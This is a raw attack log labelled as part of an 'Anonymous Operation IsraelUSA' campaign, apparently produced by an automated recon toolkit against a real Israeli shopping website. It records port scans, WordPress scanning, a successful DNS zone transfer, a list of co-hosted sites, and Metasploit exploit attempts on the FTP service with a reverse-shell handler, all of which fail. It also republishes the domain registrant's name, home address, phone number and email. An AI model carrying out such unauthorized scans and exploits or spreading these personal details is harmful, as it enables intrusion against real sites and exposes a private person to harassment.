Anonymous Operation IsraelUSA JTSEC full recon #20

1. #######################################################################################################################################
2. Hostname www.ishopy.co.il ISP Bezeq International (AS8551)
3. Continent Asia Flag
4. IL
5. Country Israel Country Code IL (ISR)
6. Region Unknown Local time 05 Jan 2018 03:00 IST
7. City Unknown Latitude 31.5
8. IP Address 81.218.229.174 Longitude 34.75
9. #######################################################################################################################################
10. [i] Scanning Site: http://ishopy.co.il
11.  
12.  
13.  
14. B A S I C I N F O
15. ====================
16.  
17.  
18. [+] Site Title: הקניון של היזמים החדשים - ISHOPY
19. [+] IP address: 81.218.229.174
20. [+] Web Server: Apache/2
21. [+] CMS: WordPress
22. [+] Cloudflare: Not Detected
23. [+] Robots File: Found
24.  
25. -------------[ contents ]----------------
26. User-agent: *
27. Disallow: /wp-admin/
28.  
29. -----------[end of contents]-------------
30.  
31.  
32.  
33. W H O I S L O O K U P
34. ========================
35.  
36.  
37. % The data in the WHOIS database of the .il registry is provided
38. % by ISOC-IL for information purposes, and to assist persons in
39. % obtaining information about or related to a domain name
40. % registration record. ISOC-IL does not guarantee its accuracy.
41. % By submitting a WHOIS query, you agree that you will use this
42. % Data only for lawful purposes and that, under no circumstances
43. % will you use this Data to: (1) allow, enable, or otherwise
44. % support the transmission of mass unsolicited, commercial
45. % advertising or solicitations via e-mail (spam);
46. % or (2) enable high volume, automated, electronic processes that
47. % apply to ISOC-IL (or its systems).
48. % ISOC-IL reserves the right to modify these terms at any time.
49. % By submitting this query, you agree to abide by this policy.
50.  
51. query: ishopy.co.il
52.  
53. reg-name: ishopy
54. domain: ishopy.co.il
55.  
56. descr: acumana LTD
57. descr: Hatichon 33
58. descr: Haifa
59. descr: 32296
60. descr: Israel
61. e-mail: chenganel AT gmail.com
62. admin-c: GI-CG5194-IL
63. tech-c: GI-CG5194-IL
64. zone-c: GI-CG5194-IL
65. nserver: ns1.qwais.com
66. nserver: ns2.qwais.com
67. validity: 12-12-2019
68. DNSSEC: unsigned
69. status: Transfer Locked
70. changed: domain-registrar AT isoc.org.il 20131212 (Assigned)
71. changed: domain-registrar AT isoc.org.il 20131218 (Changed)
72. changed: domain-registrar AT isoc.org.il 20140309 (Changed)
73.  
74. person: chen ganel
75. address: Hatichon 33
76. address: Haifa
77. address: 32296
78. address: Israel
79. phone: +972 54 2333399
80. e-mail: chenganel AT gmail.com
81. nic-hdl: GI-CG5194-IL
82. changed: Managing Registrar 20131117
83.  
84. registrar name: Gorni Interactive Ltd
85. registrar info: http://www.box.co.il/
86.  
87. % Rights to the data above are restricted by copyright.
88.  
89.  
90.  
91.  
92. G E O I P L O O K U P
93. =========================
94.  
95. [i] IP Address: 81.218.229.174
96. [i] Country: IL
97. [i] State: N/A
98. [i] City: N/A
99. [i] Latitude: 31.500000
100. [i] Longitude: 34.750000
101.  
102.  
103.  
104.  
105. H T T P H E A D E R S
106. =======================
107.  
108.  
109. [i] HTTP/1.1 301 Moved Permanently
110. [i] Date: Fri, 05 Jan 2018 01:02:27 GMT
111. [i] Server: Apache/2
112. [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
113. [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
114. [i] Pragma: no-cache
115. [i] X-Pingback: http://www.ishopy.co.il/xmlrpc.php
116. [i] Set-Cookie: PHPSESSID=vdd5fie0kk6245t6gno6njvu24; path=/
117. [i] Location: http://www.ishopy.co.il/
118. [i] Vary: Accept-Encoding,User-Agent
119. [i] Content-Length: 0
120. [i] Connection: close
121. [i] Content-Type: text/html; charset=UTF-8
122. [i] HTTP/1.1 200 OK
123. [i] Date: Fri, 05 Jan 2018 01:02:28 GMT
124. [i] Server: Apache/2
125. [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
126. [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
127. [i] Pragma: no-cache
128. [i] X-Pingback: http://www.ishopy.co.il/xmlrpc.php
129. [i] Set-Cookie: PHPSESSID=5jueoli3hcoql454red9ldd8s3; path=/
130. [i] Vary: Accept-Encoding,User-Agent
131. [i] Connection: close
132. [i] Content-Type: text/html; charset=UTF-8
133.  
134.  
135.  
136.  
137. D N S L O O K U P
138. ===================
139.  
140. ishopy.co.il. 14399 IN MX 10 mail.ishopy.co.il.
141. ishopy.co.il. 14399 IN TXT "v=spf1 a mx ip4:81.218.229.174 ~all"
142. ishopy.co.il. 14399 IN A 81.218.229.174
143. ishopy.co.il. 14399 IN SOA ns1.qwais.com. hostmaster.ishopy.co.il. 2015020101 14400 3600 1209600 86400
144. ishopy.co.il. 14399 IN NS ns2.qwais.com.
145. ishopy.co.il. 14399 IN NS ns1.qwais.com.
146.  
147.  
148.  
149.  
150. S U B N E T C A L C U L A T I O N
151. ====================================
152.  
153. Address = 81.218.229.174
154. Network = 81.218.229.174 / 32
155. Netmask = 255.255.255.255
156. Broadcast = not needed on Point-to-Point links
157. Wildcard Mask = 0.0.0.0
158. Hosts Bits = 0
159. Max. Hosts = 1 (2^0 - 0)
160. Host Range = { 81.218.229.174 - 81.218.229.174 }
161.  
162.  
163.  
164. N M A P P O R T S C A N
165. ============================
166.  
167.  
168. Starting Nmap 7.01 ( https://nmap.org ) at 2018-01-05 01:02 UTC
169. Nmap scan report for ishopy.co.il (81.218.229.174)
170. Host is up (0.14s latency).
171. rDNS record for 81.218.229.174: mail.qwais.com
172. PORT STATE SERVICE VERSION
173. 21/tcp open ftp ProFTPD 1.3.4b
174. 22/tcp filtered ssh
175. 23/tcp filtered telnet
176. 25/tcp open smtp Exim smtpd 4.80.1
177. 80/tcp open http Apache httpd 2
178. 110/tcp open pop3 Dovecot DirectAdmin pop3d
179. 143/tcp open imap Dovecot imapd
180. 443/tcp open ssl/http Apache httpd 2
181. 445/tcp filtered microsoft-ds
182. 3389/tcp filtered ms-wbt-server
183. Service Info: Hosts: il1.qwais.com, localhost; OS: Unix
184.  
185. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
186. Nmap done: 1 IP address (1 host up) scanned in 16.00 seconds
187.  
188. [!] IP Address : 81.218.229.174
189. [!] Server: Apache/2
190. [-] Clickjacking protection is not in place.
191. [!] CMS Detected : WordPress
192. [?] Would you like to use WPScan? [Y/n] Y
193. _______________________________________________________________
194. __ _______ _____
195. \ \ / / __ \ / ____|
196. \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
197. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
198. \ /\ / | | ____) | (__| (_| | | | |
199. \/ \/ |_| |_____/ \___|\__,_|_| |_|
200.  
201. WordPress Security Scanner by the WPScan Team
202. Version 2.9.3
203. Sponsored by Sucuri - https://sucuri.net
204. @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
205. _______________________________________________________________
206.  
207. [+] URL: http://www.ishopy.co.il/
208. [+] Started: Thu Jan 4 20:04:28 2018
209.  
210. [+] robots.txt available under: 'http://www.ishopy.co.il/robots.txt'
211. [+] Interesting header: SERVER: Apache/2
212.  
213. [!] The target seems to be down
214. [+] Honeypot Probabilty: 30%
215. ----------------------------------------
216. PORT STATE SERVICE VERSION
217. 21/tcp open ftp ProFTPD 1.3.4b
218. 22/tcp filtered ssh
219. 23/tcp filtered telnet
220. 25/tcp open smtp Exim smtpd 4.80.1
221. 80/tcp open http Apache httpd 2
222. 110/tcp open pop3 Dovecot DirectAdmin pop3d
223. 143/tcp open imap Dovecot imapd
224. 443/tcp open ssl/http Apache httpd 2
225. 445/tcp filtered microsoft-ds
226. 3389/tcp filtered ms-wbt-server
227. ----------------------------------------
228.  
229. [+] DNS Records
230.  
231. [+] Host Records (A)
232. www.ishopy.co.ilHTTP: (mail.qwais.com) (81.218.229.174) AS8551 Bezeq International Israel
233.  
234. [+] TXT Records
235.  
236. [+] DNS Map: https://dnsdumpster.com/static/map/www.ishopy.co.il.png
237.  
238. [>] Initiating 3 intel modules
239. [>] Loading Alpha module (1/3)
240. [>] Beta module deployed (2/3)
241. [>] Gamma module initiated (3/3)
242. [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +
243. Server: 192.168.1.254
244. Address: 192.168.1.254#53
245.  
246. Non-authoritative answer:
247. Name: ishopy.co.il
248. Address: 81.218.229.174
249.  
250. ishopy.co.il has address 81.218.229.174
251. ishopy.co.il mail is handled by 10 mail.ishopy.co.il.
252.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
253.  
254. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
255.  
256. [+] Target is ishopy.co.il
257. [+] Loading modules.
258. [+] Following modules are loaded:
259. [x] [1] ping:icmp_ping - ICMP echo discovery module
260. [x] [2] ping:tcp_ping - TCP-based ping discovery module
261. [x] [3] ping:udp_ping - UDP-based ping discovery module
262. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
263. [x] [5] infogather:portscan - TCP and UDP PortScanner
264. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
265. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
266. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
267. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
268. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
269. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
270. [x] [12] fingerprint:smb - SMB fingerprinting module
271. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
272. [+] 13 modules registered
273. [+] Initializing scan engine
274. [+] Running scan engine
275. [-] ping:tcp_ping module: no closed/open TCP ports known on 81.218.229.174. Module test failed
276. [-] ping:udp_ping module: no closed/open UDP ports known on 81.218.229.174. Module test failed
277. [-] No distance calculation. 81.218.229.174 appears to be dead or no ports known
278. [+] Host: 81.218.229.174 is down (Guess probability: 0%)
279. [+] Cleaning up scan engine
280. [+] Modules deinitialized
281. [+] Execution completed.
282.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
283.  
284. % The data in the WHOIS database of the .il registry is provided
285. % by ISOC-IL for information purposes, and to assist persons in
286. % obtaining information about or related to a domain name
287. % registration record. ISOC-IL does not guarantee its accuracy.
288. % By submitting a WHOIS query, you agree that you will use this
289. % Data only for lawful purposes and that, under no circumstances
290. % will you use this Data to: (1) allow, enable, or otherwise
291. % support the transmission of mass unsolicited, commercial
292. % advertising or solicitations via e-mail (spam);
293. % or (2) enable high volume, automated, electronic processes that
294. % apply to ISOC-IL (or its systems).
295. % ISOC-IL reserves the right to modify these terms at any time.
296. % By submitting this query, you agree to abide by this policy.
297.  
298. query: ishopy.co.il
299.  
300. reg-name: ishopy
301. domain: ishopy.co.il
302.  
303. descr: acumana LTD
304. descr: Hatichon 33
305. descr: Haifa
306. descr: 32296
307. descr: Israel
308. e-mail: chenganel AT gmail.com
309. admin-c: GI-CG5194-IL
310. tech-c: GI-CG5194-IL
311. zone-c: GI-CG5194-IL
312. nserver: ns1.qwais.com
313. nserver: ns2.qwais.com
314. validity: 12-12-2019
315. DNSSEC: unsigned
316. status: Transfer Locked
317. changed: domain-registrar AT isoc.org.il 20131212 (Assigned)
318. changed: domain-registrar AT isoc.org.il 20131218 (Changed)
319. changed: domain-registrar AT isoc.org.il 20140309 (Changed)
320.  
321. person: chen ganel
322. address: Hatichon 33
323. address: Haifa
324. address: 32296
325. address: Israel
326. phone: +972 54 2333399
327. e-mail: chenganel AT gmail.com
328. nic-hdl: GI-CG5194-IL
329. changed: Managing Registrar 20131117
330.  
331. registrar name: Gorni Interactive Ltd
332. registrar info: http://www.box.co.il/
333.  
334. % Rights to the data above are restricted by copyright.
335.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
336.  
337. *******************************************************************
338. * *
339. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
340. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
341. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
342. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
343. * *
344. * TheHarvester Ver. 2.7 *
345. * Coded by Christian Martorella *
346. * Edge-Security Research *
347. * cmartorella@edge-security.com *
348. *******************************************************************
349.  
350.  
351. Full harvest..
352. [-] Searching in Google..
353. Searching 0 results...
354. Searching 100 results...
355. Searching 200 results...
356. [-] Searching in PGP Key server..
357. [-] Searching in Bing..
358. Searching 50 results...
359. Searching 100 results...
360. Searching 150 results...
361. Searching 200 results...
362. [-] Searching in Exalead..
363. Searching 50 results...
364. Searching 100 results...
365. Searching 150 results...
366. Searching 200 results...
367. Searching 250 results...
368.  
369.  
370. [+] Emails found:
371. ------------------
372. pixel-1515149593866654-web-@ishopy.co.il
373. pixel-1515149594476419-web-@ishopy.co.il
374.  
375. [+] Hosts found in search engines:
376. ------------------------------------
377. [-] Resolving hostnames IPs...
378. 81.218.229.174:www.ishopy.co.il
379. [+] Virtual hosts:
380. ==================
381. 81.218.229.174 www.kollelkotel.com
382. 81.218.229.174 www.vipri.co.il
383. 81.218.229.174 www.budulina.co.il
384. 81.218.229.174 www.hodayot.com
385. 81.218.229.174 phr.co.il
386. 81.218.229.174 kavim.com
387. 81.218.229.174 www.zohara-klein.co.il
388. 81.218.229.174 tov.co.il
389.  
390. ******************************************************
391. * /\/\ ___| |_ __ _ __ _ ___ ___ / _(_) | *
392. * / \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
393. * / /\/\ \ __/ || (_| | (_| | (_) | (_) | _| | | *
394. * \/ \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
395. * |___/ *
396. * Metagoofil Ver 2.2 *
397. * Christian Martorella *
398. * Edge-Security.com *
399. * cmartorella_at_edge-security.com *
400. ******************************************************
401.  
402. [-] Starting online search...
403.  
404. [-] Searching for doc files, with a limit of 200
405. Searching 100 results...
406. Searching 200 results...
407. Results: 0 files found
408. Starting to download 50 of them:
409. ----------------------------------------
410.  
411.  
412. [-] Searching for pdf files, with a limit of 200
413. Searching 100 results...
414. Searching 200 results...
415. Results: 5 files found
416. Starting to download 50 of them:
417. ----------------------------------------
418.  
419. [1/50] /webhp?hl=en-CA
420. [x] Error downloading /webhp?hl=en-CA
421. [2/50] /intl/en/ads
422. [x] Error downloading /intl/en/ads
423. [3/50] /services
424. [x] Error downloading /services
425. [4/50] /intl/en/policies/privacy/
426. [5/50] /intl/en/policies/terms/
427.  
428. [-] Searching for xls files, with a limit of 200
429. Searching 100 results...
430. Searching 200 results...
431. Results: 0 files found
432. Starting to download 50 of them:
433. ----------------------------------------
434.  
435.  
436. [-] Searching for csv files, with a limit of 200
437. Searching 100 results...
438. Searching 200 results...
439. Results: 0 files found
440. Starting to download 50 of them:
441. ----------------------------------------
442.  
443.  
444. [-] Searching for txt files, with a limit of 200
445. Searching 100 results...
446. Searching 200 results...
447. Results: 0 files found
448. Starting to download 50 of them:
449. ----------------------------------------
450.  
451. processing
452. user
453. email
454.  
455. [+] List of users found:
456. --------------------------
457.  
458. [+] List of software found:
459. -----------------------------
460.  
461. [+] List of paths and servers found:
462. ---------------------------------------
463.  
464. [+] List of e-mails found:
465. ----------------------------
466.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
467.  
468. ; <<>> DiG 9.11.2-5-Debian <<>> -x ishopy.co.il
469. ;; global options: +cmd
470. ;; Got answer:
471. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54434
472. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
473.  
474. ;; OPT PSEUDOSECTION:
475. ; EDNS: version: 0, flags:; udp: 4096
476. ;; QUESTION SECTION:
477. ;il.co.ishopy.in-addr.arpa. IN PTR
478.  
479. ;; AUTHORITY SECTION:
480. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102523 1800 900 604800 3600
481.  
482. ;; Query time: 153 msec
483. ;; SERVER: 192.168.1.254#53(192.168.1.254)
484. ;; WHEN: Fri Jan 05 05:53:39 EST 2018
485. ;; MSG SIZE rcvd: 122
486.  
487. dnsenum VERSION:1.2.4
488. 
489. ----- ishopy.co.il -----
490. 
491.  
492. Host's addresses:
493. __________________
494.  
495. ishopy.co.il. 14231 IN A 81.218.229.174
496. 
497.  
498. Name Servers:
499. ______________
500.  
501. ns1.qwais.com. 14399 IN A 81.218.229.174
502. ns2.qwais.com. 14399 IN A 81.218.229.192
503. 
504.  
505. Mail (MX) Servers:
506. ___________________
507.  
508. mail.ishopy.co.il. 14231 IN A 81.218.229.174
509. 
510.  
511. Trying Zone Transfers and getting Bind Versions:
512. _________________________________________________
513.  
514. 
515. Trying Zone Transfer for ishopy.co.il on ns1.qwais.com ...
516. ishopy.co.il. 14400 IN SOA (
517. ishopy.co.il. 14400 IN MX 10
518. ishopy.co.il. 14400 IN TXT "v=spf1
519. ishopy.co.il. 14400 IN A 81.218.229.174
520. ishopy.co.il. 14400 IN NS ns1.qwais.com.
521. ishopy.co.il. 14400 IN NS ns2.qwais.com.
522. ftp.ishopy.co.il. 14400 IN A 81.218.229.174
523. localhost.ishopy.co.il. 14400 IN AAAA ::1
524. localhost.ishopy.co.il. 14400 IN A 127.0.0.1
525. mail.ishopy.co.il. 14400 IN A 81.218.229.174
526. old.ishopy.co.il. 14400 IN A 81.218.229.174
527. www.old.ishopy.co.il. 14400 IN A 81.218.229.174
528. pop.ishopy.co.il. 14400 IN A 81.218.229.174
529. smtp.ishopy.co.il. 14400 IN A 81.218.229.174
530. www.ishopy.co.il. 14400 IN A 81.218.229.174
531.  
532. Trying Zone Transfer for ishopy.co.il on ns2.qwais.com ...
533. ishopy.co.il. 14400 IN SOA (
534. ishopy.co.il. 14400 IN MX 10
535. ishopy.co.il. 14400 IN TXT "v=spf1
536. ishopy.co.il. 14400 IN A 81.218.229.174
537. ishopy.co.il. 14400 IN NS ns1.qwais.com.
538. ishopy.co.il. 14400 IN NS ns2.qwais.com.
539. ftp.ishopy.co.il. 14400 IN A 81.218.229.174
540. localhost.ishopy.co.il. 14400 IN AAAA ::1
541. localhost.ishopy.co.il. 14400 IN A 127.0.0.1
542. mail.ishopy.co.il. 14400 IN A 81.218.229.174
543. old.ishopy.co.il. 14400 IN A 81.218.229.174
544. www.old.ishopy.co.il. 14400 IN A 81.218.229.174
545. pop.ishopy.co.il. 14400 IN A 81.218.229.174
546. smtp.ishopy.co.il. 14400 IN A 81.218.229.174
547. www.ishopy.co.il. 14400 IN A 81.218.229.174
548.  
549. brute force file not specified, bay.
550.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
551. 
552. ____ _ _ _ _ _____
553. / ___| _ _| |__ | (_)___| |_|___ / _ __
554. \___ \| | | | '_ \| | / __| __| |_ \| '__|
555. ___) | |_| | |_) | | \__ \ |_ ___) | |
556. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
557.  
558. # Coded By Ahmed Aboul-Ela - @aboul3la
559.  
560. [-] Enumerating subdomains now for ishopy.co.il
561. [-] verbosity is enabled, will show the subdomains results in realtime
562. [-] Searching now in Baidu..
563. [-] Searching now in Yahoo..
564. [-] Searching now in Google..
565. [-] Searching now in Bing..
566. [-] Searching now in Ask..
567. [-] Searching now in Netcraft..
568. [-] Searching now in DNSdumpster..
569. [-] Searching now in Virustotal..
570. [-] Searching now in ThreatCrowd..
571. [-] Searching now in SSL Certificates..
572. [-] Searching now in PassiveDNS..
573. Virustotal: mail.ishopy.co.il
574. Yahoo: www.ishopy.co.il
575. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-ishopy.co.il.txt
576. [-] Total Unique Subdomains Found: 2
577. www.ishopy.co.il
578. mail.ishopy.co.il
579.  
580.  ╔═╗╦═╗╔╦╗╔═╗╦ ╦
581.  ║ ╠╦╝ ║ ╚═╗╠═╣
582.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
583.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
584. 
585.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-ishopy.co.il-full.txt
586. 
587.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
588.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
589.  
590.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
591. PING ishopy.co.il (81.218.229.174) 56(84) bytes of data.
592.  
593. --- ishopy.co.il ping statistics ---
594. 1 packets transmitted, 0 received, 100% packet loss, time 0ms
595.  
596.  
597.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
598.  
599. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 05:54 EST
600. Nmap scan report for ishopy.co.il (81.218.229.174)
601. Host is up (0.17s latency).
602. rDNS record for 81.218.229.174: mail.qwais.com
603. Not shown: 461 filtered ports, 1 closed port
604. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
605. PORT STATE SERVICE
606. 21/tcp open ftp
607. 53/tcp open domain
608. 80/tcp open http
609. 110/tcp open pop3
610. 143/tcp open imap
611. 443/tcp open https
612. 465/tcp open smtps
613. 587/tcp open submission
614. 993/tcp open imaps
615. 995/tcp open pop3s
616. 2222/tcp open EtherNetIP-1
617.  
618. Nmap done: 1 IP address (1 host up) scanned in 6.13 seconds
619.  
620.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
621.  + -- --=[Port 21 opened... running tests...
622.  
623. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 05:54 EST
624. Nmap scan report for ishopy.co.il (81.218.229.174)
625. Host is up (0.17s latency).
626. rDNS record for 81.218.229.174: mail.qwais.com
627. Skipping host ishopy.co.il (81.218.229.174) due to host timeout
628. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
629. Nmap done: 1 IP address (1 host up) scanned in 905.25 seconds
630. 
631. _---------.
632. .' ####### ;."
633. .---,. ;@ @@`; .---,..
634. ." @@@@@'.,'@@ @@@@@',.'@@@@ ".
635. '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
636. `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
637. "--'.@@@ -.@ @ ,'- .'--"
638. ".@' ; @ @ `. ;'
639. |@@@@ @@@ @ .
640. ' @@@ @@ @@ ,
641. `.@@@@ @@ .
642. ',@@ @ ; _____________
643. ( 3 C ) /|___ / Metasploit! \
644. ;@'. __*__,." \|--- \_____________/
645. '(.,...."/
646. 
647.  
648. =[ metasploit v4.16.28-dev ]
649. + -- --=[ 1716 exploits - 985 auxiliary - 300 post ]
650. + -- --=[ 507 payloads - 40 encoders - 10 nops ]
651. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
652.  
653. RHOST => ishopy.co.il
654. RHOSTS => ishopy.co.il
655. [-] ishopy.co.il:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (ishopy.co.il:21).
656. [*] Exploit completed, but no session was created.
657. [*] Started reverse TCP double handler on 192.168.1.65:4444
658. [-] ishopy.co.il:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (ishopy.co.il:21).
659. [*] Exploit completed, but no session was created.
660.  + -- --=[Port 22 closed... skipping.
661.  + -- --=[Port 23 closed... skipping.
662.  + -- --=[Port 25 closed... skipping.
663.  + -- --=[Port 53 opened... running tests...
664.  
665. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 06:10 EST
666. Nmap scan report for ishopy.co.il (81.218.229.174)
667. Host is up.
668. rDNS record for 81.218.229.174: mail.qwais.com
669. Skipping host ishopy.co.il (81.218.229.174) due to host timeout
670. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
671. Nmap done: 1 IP address (1 host up) scanned in 910.96 seconds
672.  + -- --=[Port 79 closed... skipping.
673.  + -- --=[Port 80 opened... running tests...
674.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
675.  
676. ^ ^
677. _ __ _ ____ _ __ _ _ ____
678. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
679. | V V // o // _/ | V V // 0 // 0 // _/
680. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
681. <
682. ...'
683.  
684. WAFW00F - Web Application Firewall Detection Tool
685.  
686. By Sandro Gauci && Wendel G. Henrique
687.  
688. Checking http://ishopy.co.il
689.  
690.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
691. http://ishopy.co.il [ Unassigned]
692.  
693.  __ ______ _____ 
694.  \ \/ / ___|_ _|
695.  \ /\___ \ | | 
696.  / \ ___) || | 
697.  /_/\_|____/ |_| 
698.  
699. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
700. + -- --=[Target: ishopy.co.il:80
701. + -- --=[Port is closed!
702.  
703.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
704. + -- --=[Checking if X-Content options are enabled on ishopy.co.il... 
705.  
706. + -- --=[Checking if X-Frame options are enabled on ishopy.co.il... 
707.  
708. + -- --=[Checking if X-XSS-Protection header is enabled on ishopy.co.il... 
709.  
710. + -- --=[Checking HTTP methods on ishopy.co.il... 
711.  
712. + -- --=[Checking if TRACE method is enabled on ishopy.co.il... 
713.  
714. + -- --=[Checking for META tags on ishopy.co.il... 
715.  
716. + -- --=[Checking for open proxy on ishopy.co.il... 
717.  
718. + -- --=[Enumerating software on ishopy.co.il... 
719.  
720. + -- --=[Checking if Strict-Transport-Security is enabled on ishopy.co.il... 
721.  
722. + -- --=[Checking for Flash cross-domain policy on ishopy.co.il... 
723.  
724. + -- --=[Checking for Silverlight cross-domain policy on ishopy.co.il... 
725.  
726. + -- --=[Checking for HTML5 cross-origin resource sharing on ishopy.co.il... 
727.  
728. + -- --=[Retrieving robots.txt on ishopy.co.il... 
729.  
730. + -- --=[Retrieving sitemap.xml on ishopy.co.il... 
731.  
732. + -- --=[Checking cookie attributes on ishopy.co.il... 
733.  
734. + -- --=[Checking for ASP.NET Detailed Errors on ishopy.co.il... 
735.  
736. 
737.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
738. - Nikto v2.1.6
739. ---------------------------------------------------------------------------
740. + No web server found on ishopy.co.il:80
741. ---------------------------------------------------------------------------
742. + 0 host(s) tested
743.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
744. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/ishopy.co.il-port80.jpg
745.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
746.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
747.  
748.  _____  .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
749.  (_____) 01 01N. C 01 C 01 .01. 01  01 Yb 01 .01.
750.  (() ()) 01 C YCb C 01 C 01 ,C9 01  01 dP 01 ,C9
751.  \ /  01 C .CN. C 01 C 0101dC9 01  01'''bg. 0101dC9
752.  \ /  01 C .01.C 01 C 01 YC. 01 ,  01 .Y 01 YC.
753.  /=\  01 C Y01 YC. ,C 01 .Cb. 01 ,C  01 ,9 01 .Cb.
754.  [___]  .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
755.  
756. __[ ! ] Neither war between hackers, nor peace for the system.
757. __[ ! ] http://blog.inurl.com.br
758. __[ ! ] http://fb.com/InurlBrasil
759. __[ ! ] http://twitter.com/@googleinurl
760. __[ ! ] http://github.com/googleinurl
761. __[ ! ] Current PHP version::[ 7.0.26-1 ]
762. __[ ! ] Current script owner::[ root ]
763. __[ ! ] Current uname::[ Linux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 ]
764. __[ ! ] Current pwd::[ /usr/share/sniper ]
765. __[ ! ] Help: php inurlbr.php --help
766. ------------------------------------------------------------------------------------------------------------------------
767.  
768. [ ! ] Starting SCANNER INURLBR 2.1 at [05-01-2018 07:08:48]
769. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
770. It is the end user's responsibility to obey all applicable local, state and federal laws.
771. Developers assume no liability and are not responsible for any misuse or damage caused by this program
772.  
773. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-ishopy.co.il.txt ]
774. [ INFO ][ DORK ]::[ site:ishopy.co.il ]
775. [ INFO ][ SEARCHING ]:: {
776. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.my ]
777.  
778. [ INFO ][ SEARCHING ]:: 
779. -[:::]
780. [ INFO ][ ENGINE ]::[ GOOGLE API ]
781.  
782. [ INFO ][ SEARCHING ]:: 
783. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
784. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.jo ID: 005911257635119896548:iiolgmwf2se ]
785.  
786. [ INFO ][ SEARCHING ]:: 
787. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
788.  
789. [ INFO ][ TOTAL FOUND VALUES ]:: [ 55 ]
790.  
791. 
792.  _[ - ]::--------------------------------------------------------------------------------------------------------------
793. |_[ + ] [ 0 / 55 ]-[07:09:03] [ - ] 
794. |_[ + ] Target:: [ http://www.ishopy.co.il/ ]
795. |_[ + ] Exploit:: 
796. |_[ + ] Information Server:: , , IP::0 
797. |_[ + ] More details:: 
798. |_[ + ] Found:: UNIDENTIFIED
799. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
800. 
801.  _[ - ]::--------------------------------------------------------------------------------------------------------------
